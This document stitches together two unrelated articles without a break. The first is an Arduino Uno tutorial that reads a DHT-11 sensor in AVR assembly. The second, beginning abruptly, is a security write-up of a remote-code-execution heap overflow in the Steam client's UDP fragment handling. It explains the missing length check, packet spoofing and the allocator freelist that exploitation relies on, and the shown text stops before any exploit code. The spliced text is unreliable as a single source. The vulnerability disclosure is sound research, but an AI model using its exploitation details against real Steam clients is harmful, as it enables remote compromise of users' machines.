How to program an Arduino in assembly

Reading a DHT-11 temperature sensor on "bare metal" Arduino Uno (ATmega328p), using nothing but assembly

Let's use a simple example to see how you can "hack" an Arduino Uno and start writing programs in machine code, that is, in assembly, for the ATmega328p microcontroller. Most of the inexpensive "classic" 'duino boards are built around this very chip. The code will also run on practically any demo board based on the ATmega328p and, after small possible tweaks, on any Arduino board built on an Atmel AVR microcontroller. In this example I tried to get as close to the hardware as possible. To better understand how the microcontroller works we will not use any ready-made libraries, let alone the Arduino IDE. As a training exercise we will do just about the simplest thing possible: correctly and usefully wiggle a single microcontroller pin, in other words, read data from a DHT-11 temperature and humidity sensor.

Arduino is a really neat thing, but a lot of what happens with the microcontroller is deliberately hidden in the depths of the libraries and the Arduino environment so as not to scare off beginners. After playing with a blinking LED I wanted to understand how the microcontroller actually works. Besides scratching a purely educational itch, knowing how the microcontroller and its standard means of talking to the outside world (the so-called peripherals) work gives you an advantage when writing code for Arduino as well as when writing C or assembly for microcontrollers in general, and helps you create more efficient programs. So, we will do everything as close to the metal as possible. We have: an Arduino Uno compatible board, a DHT-11 sensor, three wires, Atmel Studio, and machine code.

First, let's get the necessary equipment ready.

We will write code in Atmel Studio 7, which can be downloaded for free from the site of the microcontroller's manufacturer, Atmel.

Atmel Studio 7

All the code was run on an Arduino Uno clone, in my case a DFRduino Uno from DFRobot, built on an ATmega328p running at 16 MHz, an excellent and reliable board. I have not noticed any differences from a standard Uno in everyday use. A similar black board from DFRobot, only a "Mega", flew for two years as the flight controller of my quadcopter; it ended up in all sorts of places and never gave me any trouble.

DFRduino Uno

To look at signals lasting microseconds (that is, millionths of a second), I used a device called a logic analyzer, specifically a clone of the eight-channel USBEE AX Pro. How you would debug such fast processes without an oscilloscope or a logic analyzer, I honestly do not know and cannot recommend anything.

First of all I connected my Uno clone (as I said, a DFRduino Uno) to Atmel Studio 7 and decided to try blinking an LED in assembly. How to set up the connection is described in many places; one example is linked at the end. The code is written right in the Studio, and the board can be flashed over the USB port using the familiar Arduino bootloader, via AVRDude. You can also flash through an external programmer; I tried a Chinese USBASP, and in fact both methods worked for me. In both cases you only need to configure AVRDude correctly; an example of my settings is in the picture.

The full argument string:
-C "C:\avrdude\avrdude.conf" -p atmega328p -c arduino -P COM7 -b 115200 -U flash:w:"$(ProjectDir)Debug\$(TargetName).hex":i

In the end, for simplicity, I settled on flashing over the USB port, which is the standard way for Arduino. My Uno has an ATmega328P chip, and that is what you need to specify when creating the project. You also need to select the port the Arduino is connected to; on my computer it was COM7.

To simply blink an LED no extra wiring is needed: we will use the LED on the board itself, connected to Arduino pin D13, which, as a reminder, is pin 5 of the controller's PORTB.

Connect the board to the computer with a USB cable, write the code in the Studio, and flash it straight from the Studio. The main problem here is actually seeing the blinking, because the controller runs at 16 MHz, and if we turn the LED on and off at that rate all we will see is a dimly glowing LED and nothing more.

To see when it is lit and when it is off, we will turn the LED on and keep the processor busy with useless work for roughly one second. The delay itself can be calculated by hand, knowing the clock frequency (one simple instruction executes in one cycle), or with a dedicated calculator (link at the bottom). With the delay in place, code doing roughly the same thing as the classic Arduino "Blink" might look like this:

      			cli
			sbi DDRB, 5	; PORT B, pin 5 - output
			sbi PORTB, 5	; set pin 5 to logic one

loop:						    ; delay 1000 ms
			ldi  r18, 82
			ldi  r19, 43
			ldi  r20, 0
L1:			dec  r20
			brne L1
			dec  r19
			brne L1
			dec  r18
			brne L1
			nop
			
			in R16, PORTB	; toggle (XOR) bit 5 of the port
			ldi R17, 0b00100000
			EOR R16, R17
			out PORTB, R16
			
			rjmp loop
Once more: on my board the Arduino LED (D13) sits on pin 5 of the ATmega's PORTB.
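As a sanity check, the loop constants above can be verified with simple arithmetic: the three registers behave like one cascaded 24-bit down counter, and each pass through the inner dec/brne pair costs about 3 cycles. A quick back-of-the-envelope estimate in C (the 82/43/0 values are the ones the delay calculator produced for me; treat this as a rough model, not an exact cycle count):

    #include <stdio.h>

    /* Rough model of the cascaded 8-bit delay loop above: the three registers
     * act like one 24-bit down counter, and each pass through "dec r20 / brne L1"
     * costs about 3 cycles (1 for dec, 2 for a taken branch). The 82/43/0 values
     * come from the delay calculator linked at the end of the article. */
    int main(void)
    {
        const unsigned long f_cpu = 16000000UL;               /* 16 MHz          */
        unsigned long iterations = 82UL * 65536 + 43UL * 256; /* ~5.37M passes   */
        unsigned long cycles = iterations * 3;                /* ~16.1M cycles   */
        printf("%lu cycles ~= %.3f s\n", cycles, (double)cycles / f_cpu);
        return 0;                                             /* prints ~1.010 s */
    }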

But writing it this way is actually not great, because we have completely ignored such important things as the stack and the interrupt vector table (more on them later).

OK, we have blinked the LED; now, to make our GPIO practice more or less meaningful, let's read values from a DHT11 sensor, and do it entirely in assembly as well.

To read data from the sensor you have to put high and low levels on the sensor's data line in the right sequence; this is exactly what "wiggling a microcontroller pin" means. On one hand there is nothing complicated about it; on the other hand it is a somewhat meaningful activity: we measure temperature and humidity, so you could say we have taken the first step towards building some sort of "weather station" in the future.

Looking one step ahead, it is worth asking what we are actually going to do with the data we read. Fine, we read the sensor and set a variable in the controller's memory to, say, 23 degrees Celsius. How do we look at those numbers? There is a solution! I will view the received data on the big computer by sending it out through the controller's USART, over a USB cable, into a virtual COM port and straight into a terminal program such as PuTTY. For the computer to be able to read our data we will use a USB-TTL converter, a small device that provides the virtual COM port in Windows.

The wiring might look roughly like this:

The sensor's signal pin is connected to pin 2 (PIN2) of the controller's PORTD, which is the same thing as Arduino pin D2. It is also pulled up to the supply "plus" through a 4.7 kOhm resistor. The sensor's plus and minus pins go to the corresponding power rails. The USB-TTL adapter is connected to the Tx output of the Arduino's USART, that is, PIN1 of the controller's PORTD.

Assembled on a breadboard:

Let's figure out the sensor and look at the datasheet. The sensor itself is simple and uses a single signal wire, which has to be pulled up to +5V through a resistor; that gives the idle "high" level on the line. When the line is free, i.e. neither the controller nor the sensor is transmitting, it sits at that high level. When the sensor or the controller transmits something, it takes over the line and pulls it to the "low" level for some time. In total the sensor sends 5 bytes. It sends them one after another: first the humidity readings, then the temperature, finishing with a checksum, which looks like "HHTTXX"; in short, see the datasheet. Five bytes is 40 bits, and each bit is encoded in a special way during transmission.

For simplicity, let's say that a "high" level on the line is a "one" and a "low" level is a "zero". According to the datasheet, to start talking to the sensor the controller must pull the signal line to ground, i.e. put a "zero" on the line, for no less than 20 ms (milliseconds), and then abruptly release the line. In response the sensor must put its own message on the signal line, made of high and low pulses of varying length, which encode the 40 bits we need. And, per the datasheet, if we read that message successfully with the controller, we immediately know that: a) the sensor actually answered, b) it sent the humidity and temperature data, c) it sent the checksum. At the end of the transmission the sensor releases the line. The datasheet also says the sensor should not be polled more often than once per second.

So, according to the datasheet, here is what the microcontroller has to do to get the sensor to answer: pull the line low for 20 milliseconds, release it, and quickly watch what is on the line:

The sensor should respond by pulling the line low for 80 microseconds (µs) and then releasing it for another 80 µs; this can be taken as confirmation that the sensor is alive on the line and responding:

After that, immediately following the falling edge from high to low, the sensor starts sending the 40 individual bits. Each bit is encoded by a special pattern consisting of two intervals. First the sensor takes the line (pulls it low) for a certain time; call it the first "half-bit". Then the sensor releases the line (it gets pulled up to one), also for a certain time; that is the second "half-bit". The durations of these "half-bit" intervals, in microseconds, encode what the sensor is actually trying to send: a "zero" bit or a "one" bit.

Here is the description of a bit pattern: the first "half-bit" is always low and of fixed duration, about 50 µs. The duration of the second "half-bit" determines what the sensor is actually sending.

To transmit a zero, a high pulse of 26-28 µs is used:

To transmit a one, the high pulse is stretched to about 70 microseconds:

We are not going to measure the exact duration of each interval; it is enough to understand that if the second "half-bit" is shorter than the first, a zero was encoded, and if the second "half-bit" is longer, a one was encoded. In total we have 40 bits, each encoded by two pulses, so we need to read 80 intervals. Once we have read all 80 intervals, we compare them in pairs, the first "half-bit" against the second.
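To make the decoding rule concrete, here is a minimal sketch of the same pairwise comparison in C (illustration only; the names are made up, and the article's actual implementation is the assembly shown further below):

    #include <stdint.h>

    /* Decode 40 bits from 80 measured half-bit durations: pair i is
     * (low interval, high interval); if the high interval is longer, the bit is 1. */
    static void decode_dht(const uint8_t cycles[80], uint8_t out[5])
    {
        for (int byte = 0; byte < 5; byte++) {
            uint8_t acc = 0;
            for (int bit = 0; bit < 8; bit++) {
                int i = (byte * 8 + bit) * 2;
                acc <<= 1;
                if (cycles[i + 1] > cycles[i])   /* second half-bit longer => 1 */
                    acc |= 1;
            }
            out[byte] = acc;
        }
    }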

It all seems simple. So what is required of the microcontroller to read the data from the sensor? It turns out we need to pull the pin low once, and then just read the whole long message from the sensor on that same pin. Along the way we split the message into "half-bits", figuring out where a zero bit is being sent and where a one. Then we assemble the resulting bits into bytes, which will be the expected humidity and temperature data.

OK, we have started writing the code, and first let's check whether the sensor works at all: we will simply pull the line low for 20 ms and look with the logic analyzer at what happens on the line as a result.

Definitions:

;==========		DEFINES =======================================
; definitions for the port the DHT11 is connected to			
				.EQU DHT_Port=PORTD
				.EQU DHT_InPort=PIND
				.EQU DHT_Pin=PORTD2
				.EQU DHT_Direction=DDRD
				.EQU DHT_Direction_Pin=DDD2

				.DEF Tmp1=R16
				.DEF USART_ByteR=R17		; the byte to be sent over the USART
				.DEF Tmp2=R18
				.DEF USART_BytesN=R19		; how many bytes to send to the USART
				.DEF Tmp3=R20
				.DEF Cycle_Count=R21		; loop counter in Expect_X
				.DEF ERR_CODE=R22			; error code returned from subroutines
				.DEF N_Cycles=R23			; counter in READ_CYCLES
				.DEF ACCUM=R24
				.DEF Tmp4=R25
As I already mentioned, the sensor itself is connected to pin 2 of port D. On the Arduino Uno this is digital pin D2 (check the Arduino pinout if in doubt).

We do everything head-on: initialize the pin as an output, drive it low, wait 20 milliseconds, release the line, switch the pin to input mode and wait for signals to appear on it.

;============	DHT11 INIT =======================================
; right after this init we must IMMEDIATELY read the sensor's response and then the data itself
DHT_INIT:		CLI	; once more, just in case: this is a time-critical section

				; save X for use in READ_CYCLES - there is no time to initialize it there
				LDI XH, High(CYCLES)	; load the high byte of the CYCLES address
				LDI XL, Low (CYCLES)	; load the low byte of the CYCLES address

				LDI Tmp1, (1<<DHT_Direction_Pin)
				OUT DHT_Direction, Tmp1			; port D, pin 2 as output

				LDI Tmp1, (0<<DHT_Pin)
				OUT DHT_Port, Tmp1			; drive the line low 

				RCALL DELAY_20MS		; wait 20 milliseconds

				LDI Tmp1, (1<<DHT_Pin)		; release the line - set it to 1
				OUT DHT_Port, Tmp1	

				RCALL DELAY_10US		; wait 10 microseconds

				
				LDI Tmp1, (0<<DHT_Direction_Pin)		; port D, pin 2 as input
				OUT DHT_Direction, Tmp1	
				LDI Tmp1,(1<<DHT_Pin)		; enable the internal pull-up on the input, in addition to the external resistor on the line
				OUT DHT_Port, Tmp1		

; wait for the sensor's response - it should pull the line low for 80 us and release it for 80 us
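For reference, the same start sequence in C with avr-libc would look roughly like this (a sketch under the assumption that F_CPU is defined as 16000000UL; the article itself deliberately stays in assembly):

    #include <avr/io.h>
    #include <util/delay.h>    /* needs F_CPU defined, e.g. 16000000UL */

    /* DHT11 start signal on PD2: hold the line low for ~20 ms, release it,
     * then switch the pin to input with the internal pull-up enabled. */
    static void dht_start(void)
    {
        DDRD  |= (1 << DDD2);       /* PD2 as output          */
        PORTD &= ~(1 << PORTD2);    /* drive the line low     */
        _delay_ms(20);
        PORTD |= (1 << PORTD2);     /* release the line       */
        _delay_us(10);
        DDRD  &= ~(1 << DDD2);      /* PD2 back to input      */
        PORTD |= (1 << PORTD2);     /* internal pull-up on    */
    }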

Let's check with the analyzer: did the sensor answer?

Yes, there is a response: the signals after our first 20 ms pulse are the sensor's answer. To capture the transmission I used a Chinese clone of the USBEE AX Pro connected to the sensor's signal wire.

Zoom in so that we can see the end of our 20 ms pulse and the start of the sensor's message. Everything is just like in the datasheet: first the sensor puts low and then high levels of 80 µs each on the line, then it starts sending bits; in this particular case the second "half-bit" carries a "0".

So the sensor works and has sent us data; now we need to read that data correctly. Since this is a learning exercise, we will solve it in the most straightforward way. At the moment the sensor responds, i.e. at the transition from high to low, we start a loop with a counter of how many times the loop has run. Inside the loop we constantly watch the level on the pin. So, in the loop, we wait for the signal on the pin to go back to the high level, thereby measuring the duration of the first "half-bit". Our microcontroller runs at 16 MHz, so over a period of, say, 50 microseconds it manages to execute around 800 instructions. When the line goes high we carefully exit the loop, and the number of iterations we counted is stored into a variable.

After the signal line has gone high we do the same thing again: count loop iterations until the sensor starts transmitting the next bit and pulls the line low. Fortunately, we do not need to know the exact duration of the pulses; it is enough to know that one interval is longer than the other. Clearly, if the sensor is sending a "zero" bit, the duration of the second "half-bit", and therefore the number of iterations we count, will be smaller than for the first "half-bit". If the sensor sent a "one" bit, the number of iterations counted during the second half-bit will be larger than during the first.

And so that we do not hang forever if the sensor suddenly fails to answer or glitches, we will only run the loop for a limited time, guaranteed to be longer than the longest possible pulse, so that if the sensor does not answer we can exit on a timeout.

The example below is for the case when the line was low and we count how many times through the loop we sampled the controller's pin until the sensor switched the line to one.

;=============	EXPECT 1 =========================================
; spin in a loop waiting for the desired state on the pin
; when it appears - exit
; report how many iterations we waited
; or return an error code on timeout if we never saw it
EXPECT_1:		LDI Cycle_Count, 0			; initialize the loop counter
			LDI ERR_CODE, 2			; error 2 - exit on timeout

			ldi  Tmp1, 2			; load the
			ldi  Tmp2, 169			; ~80 us timeout delay

EXP1L1:			INC Cycle_Count			; bump the loop counter

			IN Tmp3, DHT_InPort		; read the port
			SBRC Tmp3, DHT_Pin	; if the pin is 1 
			RJMP EXIT_EXPECT_1	; then exit
			dec  Tmp2			; otherwise keep spinning in the delay
			brne EXP1L1
			dec  Tmp1
			brne EXP1L1
			NOP					; the timeout exit lands here
			RET

EXIT_EXPECT_1:		LDI ERR_CODE, 1			; code 1 - all good, Cycle_Count holds the iteration count
			RET

An analogous subroutine (EXPECT_0) does the same for the opposite transition, counting how many loop iterations pass until the sensor pulls the line back from one down to zero.
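The idea behind both EXPECT_ routines can be summarized in C roughly as follows (a sketch; EXPECT_TIMEOUT is a made-up constant standing in for the Tmp1/Tmp2 delay values above):

    #include <avr/io.h>
    #include <stdint.h>

    #define EXPECT_TIMEOUT 400   /* made-up limit, just longer than the longest pulse */

    /* Count busy-loop iterations until PD2 reaches the requested level.
     * Returns the iteration count, or 0 if the timeout was hit. */
    static uint16_t expect_level(uint8_t level)
    {
        uint16_t count = 0;
        do {
            if (++count >= EXPECT_TIMEOUT)
                return 0;                            /* timeout, sensor silent */
        } while (((PIND >> PIND2) & 1) != level);
        return count;                                /* >= 1 on success */
    }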

To compute the time delays we use the same approach as when blinking the LED: pick the parameters of an empty loop to produce the required pause. I used a dedicated calculator; if you prefer, you can count the working instructions by hand.

Our controller has quite a lot of memory, a whole 2 (two) kilobytes, so we will not be stingy with it and will simply store the counter values for all 80 intervals (40 bits, 2 intervals per bit) into memory.

Let's declare a variable

CYCLES: .byte 80 ; buffer to store the loop counts

And save all the measured counts into memory.

;============== READ CYCLES ====================================
; read the sensor's bits and store the counts in CYCLES 
READ_CYCLES:	LDI N_Cycles, 80			; read 80 intervals
READ:		NOP
		RCALL EXPECT_1				; the low interval has elapsed
		ST X+, Cycle_Count			; store the number of iterations 
			
		RCALL EXPECT_0
		ST X+, Cycle_Count			; store the number of iterations 
		
		DEC N_Cycles				; decrement the counter
		BRNE READ					
		RET					; all intervals have been read

Now, for debugging, let's see how well the interval durations were measured and whether we really did read data from the sensor. Clearly, the iteration count for the first "half-bit" should be roughly the same for every bit, while the count for the second "half-bit" will be either noticeably smaller or noticeably larger.

To send data to the big computer we will use the controller's USART, which will push the data over the USB cable into a terminal program such as PuTTY. Again we do it head-on: stuff the byte into the right USART control register and wait until it has been sent. For convenience I also wrote a couple of helper subroutines: send several bytes starting at the address in Y, and print a newline in the terminal to keep things tidy.

;============	SEND 1 BYTE VIA USART =====================
SEND_BYTE:	NOP
SEND_BYTE_L1:	LDS Tmp1, UCSR0A
		SBRS Tmp1, UDRE0			; if the data register is empty
		RJMP SEND_BYTE_L1
		STS UDR0, USART_ByteR		; then send the byte from R17
		NOP
		RET				

;============	SEND CRLF VIA USART ===============================
SEND_CRLF:	LDI USART_ByteR, $0D
		RCALL SEND_BYTE	
		LDI USART_ByteR, $0A
		RCALL SEND_BYTE
		RET			

;============	SEND N BYTES VIA USART ============================
; Y - what to send, USART_BytesN - how many bytes
SEND_BYTES:	NOP
SBS_L1:		LD USART_ByteR, Y+
		RCALL SEND_BYTE
		DEC USART_BytesN
		BRNE SBS_L1
		RET
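For comparison, the same polled transmit in C with the avr-libc register names (a sketch; it assumes the USART has already been initialized, as USART0_INIT does in the assembly version):

    #include <avr/io.h>
    #include <stdint.h>

    /* Busy-wait until the transmit data register is empty, then send one byte. */
    static void usart_send_byte(uint8_t b)
    {
        while (!(UCSR0A & (1 << UDRE0)))
            ;                        /* wait for UDRE0: data register empty */
        UDR0 = b;
    }

    static void usart_send_crlf(void)
    {
        usart_send_byte('\r');
        usart_send_byte('\n');
    }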

Having sent the counts for all 80 intervals to the terminal, we can try to assemble the actual data bits. We do it by the book, that is, by the datasheet: compare, pair by pair, the iteration count of the first "half-bit" with that of the second. If the second half-bit is shorter, a zero was encoded; if longer, a one. After each comparison the bits are accumulated in an accumulator register and stored to memory byte by byte, starting at the address BITS.

;=============	GET BITS ===============================================
; turn CYCLES into bytes in BITS				
GET_BITS:			LDI Tmp1, 5			; prepare counters: for five bytes
				LDI Tmp2, 8			; and for each bit
				LDI ZH, High(CYCLES)	; load the high byte of the CYCLES address
				LDI ZL, Low (CYCLES)	; load the low byte of the CYCLES address
				LDI YH, High(BITS)	; load the high byte of the BITS address
				LDI YL, Low (BITS)	; load the low byte of the BITS address

ACC:				LDI ACCUM, 0			; initialize the accumulator
				LDI Tmp2, 8			; for each bit

TO_ACC:				LSL ACCUM				; shift left
				LD Tmp3, Z+			; read the count for interval [i]
				LD Tmp4, Z+			; and for interval [i+1]
				CP Tmp3, Tmp4			; compare the first half-bit with the second: positive means the bit is 0, negative means the bit is 1
				BRPL J_SHIFT		; if positive (0), just shift	
				ORI ACCUM, 1			; if negative (1), set the low bit
J_SHIFT:			DEC Tmp2				; repeat for 8 bits
				BRNE TO_ACC
				ST Y+, ACCUM			; store the accumulator
				DEC Tmp1				; for five bytes
				BRNE ACC
				RET

So at this point we have collected in memory, starting at the BITS label, the five bytes the sensor sent. But working with them in this form is not very convenient, because in memory it looks something like 34 00 21 00 XX, where 34 is the integer part of the humidity, 00 the fractional part of the humidity, 21 the temperature, 00 the fractional part of the temperature, and XX the checksum. What we want is to print something nice in the terminal, like "Temperature = 21.00". So, for convenience, let's pull the data apart into separate variables.
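Before pulling the bytes apart, it would also be reasonable to verify the fifth byte: per the DHT11 datasheet it is the low 8 bits of the sum of the first four data bytes. A quick sketch of that check in C (the assembly in this article skips it):

    #include <stdint.h>
    #include <stdbool.h>

    /* bits[0..4] = H10, H01, T10, T01, checksum, exactly as laid out in BITS. */
    static bool dht_checksum_ok(const uint8_t bits[5])
    {
        uint8_t sum = (uint8_t)(bits[0] + bits[1] + bits[2] + bits[3]);
        return sum == bits[4];
    }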

Definitions

H10:			.byte 1		; integer part of the humidity
H01:			.byte 1		; fractional part of the humidity
T10:			.byte 1		; integer part of the temperature in C
T01:			.byte 1		; fractional part of the temperature

And copy the bytes from BITS into the right variables

;============	GET HnT DATA =========================================
; pull the H10... values out of BITS
; !!! slightly hacky, because H10 and the rest are laid out sequentially in memory

GET_HnT_DATA:	NOP

				LDI ZH, HIGH(BITS)
				LDI ZL, LOW(BITS)
				LDI XH, HIGH(H10)
				LDI XL, LOW(H10)
												; TODO - switch this to a proper loop counter
				LD Tmp1, Z+			; read
				ST X+, Tmp1			; store
				
				LD Tmp1, Z+			; read
				ST X+, Tmp1			; store

				LD Tmp1, Z+			; read
				ST X+, Tmp1			; store

				LD Tmp1, Z+			; read
				ST X+, Tmp1			; store

				RET

After that we convert the numbers into ASCII codes so the data can be read normally in the terminal, add value labels (the word "Temperature" and so on) stored in flash, and send it all to the COM port, into the terminal.
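The digit-to-ASCII step itself boils down to splitting a byte into tens and units and adding the code of '0' (0x30). A tiny sketch of the idea in C (not the actual HnT_ASCII_DATA_EX routine):

    #include <stdint.h>

    /* Convert a value 0..99 into two ASCII digits, e.g. 21 -> "21". */
    static void byte_to_ascii(uint8_t value, char out[2])
    {
        out[0] = (char)('0' + value / 10);   /* tens  */
        out[1] = (char)('0' + value % 10);   /* units */
    }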

PuTTY with the data

To measure the temperature regularly, we add an endless loop with a delay of about 1200 milliseconds, since the DHT11 datasheet says the sensor should not be polled more often than once per second.

The main loop then looks roughly like this:

;============	MAIN
			;!!! main entry point
RESET:			NOP		

			; Internal Hardware Init
			CLI		; we don't need interrupts for now
				
			; stack init		
			LDI Tmp1, Low(RAMEND)
			OUT SPL, Tmp1
			LDI Tmp1, High(RAMEND)
			OUT SPH, Tmp1

			RCALL USART0_INIT

			; Init data
			RCALL COPY_STRINGS		; copy the strings into RAM
			RCALL TEST_DATA			; prepare the test data

loop:				NOP						; spin in the endless loop ....
				; External Hardware Init
				RCALL DHT_INIT
				; at this point the sensor has acknowledged and we must read the bits quickly
				RCALL READ_CYCLES
				; the time-critical section is over...
				
				;Test - send CYCLES to the USART		
				;RCALL TEST_CYCLES
				
				; extract the bits from the message
				RCALL GET_BITS
				
				;Test - send BITS to the USART
				;RCALL TEST_BITS  
				
				; turn BITS into numeric data
				RCALL GET_HnT_DATA
				
				;Test - send 4 bytes starting at H10 to the USART
				;RCALL TEST_H10_T01
				
				; prepare the temperature and humidity as ASCII		
				RCALL HnT_ASCII_DATA_EX
				
				; send the finished temperature (label plus ASCII data) to the USART
				RCALL PRINT_TEMPER
				; send the finished humidity (label plus ASCII data) to the USART
				RCALL PRINT_HUMID
				; new line, for neatness				
				RCALL SEND_CRLF
							
				RCALL DELAY_1200MS				; repeat every 1.2 seconds 
				rjmp loop		; and around we go

Flash it, connect the USB-TTL cable (converter) to the computer, start a terminal, pick the right virtual COM port and enjoy your new digital thermometer. To test it you can warm the sensor in your hand: for me the temperature goes up while the humidity, oddly enough, goes down.

Related links:
AVR Delay Calc
How to connect an Arduino for programming in Atmel Studio 7
DHT11 Datasheet
ATmega DataSheet
Atmel AVR 8-bit Instruction Set
Atmel Studio
Example code on GitHub

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to explain the story behind the corresponding bug (and to justify why we play games in the office), which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

  • Packet length
  • Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

Vulnerability Details

PREREQUISITE KNOWLEDGE

Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points (a rough, assumption-laden C sketch of this header follows the list):

  • All packets start with the 4 bytes “VS01”
  • packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
  • type describes the type of packet, which can take the following values:
    • 0x2 Authenticating Challenge
    • 0x4 Connection Accept
    • 0x5 Connection Reset
    • 0x6 Packet is a datagram fragment
    • 0x7 Packet is a standalone datagram
  • The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
  • In the case of the packet being a datagram fragment:
    • split_count refers to the number of fragments that the datagram has been split up into
    • data_len refers to the total length of the reassembled datagram
  • The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll
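Based purely on the fields named above (plus seq_no_of_first_pkt, which appears later in the analysis), the header can be pictured roughly as the struct below. This is an illustration only: apart from the 2-byte width of packet_len, the field order and sizes here are assumptions, not a verified layout.

    #include <stdint.h>

    /* Rough, unverified sketch of the Steam UDP packet header, assembled only
     * from the fields discussed in this post. Field order and widths (other
     * than the 2-byte packet_len) are assumptions made for illustration. */
    #pragma pack(push, 1)
    typedef struct {
        uint8_t  magic[4];             /* "VS01"                                  */
        uint16_t packet_len;           /* length of the payload in this packet    */
        uint8_t  type;                 /* 0x2/0x4/0x5, 0x6 fragment, 0x7 datagram */
        uint32_t source;               /* connection routing IDs                  */
        uint32_t destination;
        uint32_t seq_no;               /* assumed sequencing field                */
        uint32_t seq_no_of_first_pkt;  /* first fragment's sequence number        */
        uint32_t split_count;          /* number of fragments (type 0x6 only)     */
        uint32_t data_len;             /* total reassembled datagram length       */
    } steam_pkt_hdr;
    #pragma pack(pop)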

Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

  • Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
  • The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
  • Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709b packets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_len bytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4
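In pseudo-C, the faulty path in step 8 amounts to something like the following reconstruction (variable and function names are invented for illustration; this is not the decompiled code):

    #include <stdint.h>
    #include <stdlib.h>
    #include <string.h>

    /* Illustrative reconstruction of the flaw: the collection buffer is sized
     * from data_len, but the copy is sized from packet_len, and nothing ties
     * the two together for the first fragment of a datagram. */
    void on_first_fragment(uint32_t data_len, uint16_t packet_len,
                           const uint8_t *payload)
    {
        uint8_t *collection_buffer = malloc(data_len);    /* allocation unchecked,
                                                             as in the real code  */
        /* MISSING CHECK: if (packet_len > data_len) the packet should be dropped */
        memmove(collection_buffer, payload, packet_len);  /* up to 64 KB copied
                                                             into a tiny buffer   */
    }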

Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

  1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
  2. Allocations are sequential with no metadata separating the in-use chunks.
  3. Each large block maintains its own freelist, implemented as a singly linked list.
  4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.
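Put into code, the allocation and deallocation behaviour described above looks roughly like this (a simplified model, not Steam's actual implementation):

    #include <stddef.h>

    /* Simplified model of the custom allocator's freelist: a free chunk stores
     * the pointer to the next free chunk in its first 4 bytes, and
     * freelist_head points at the first free chunk of the block. */
    typedef struct allocator {
        void *freelist_head;
    } allocator;

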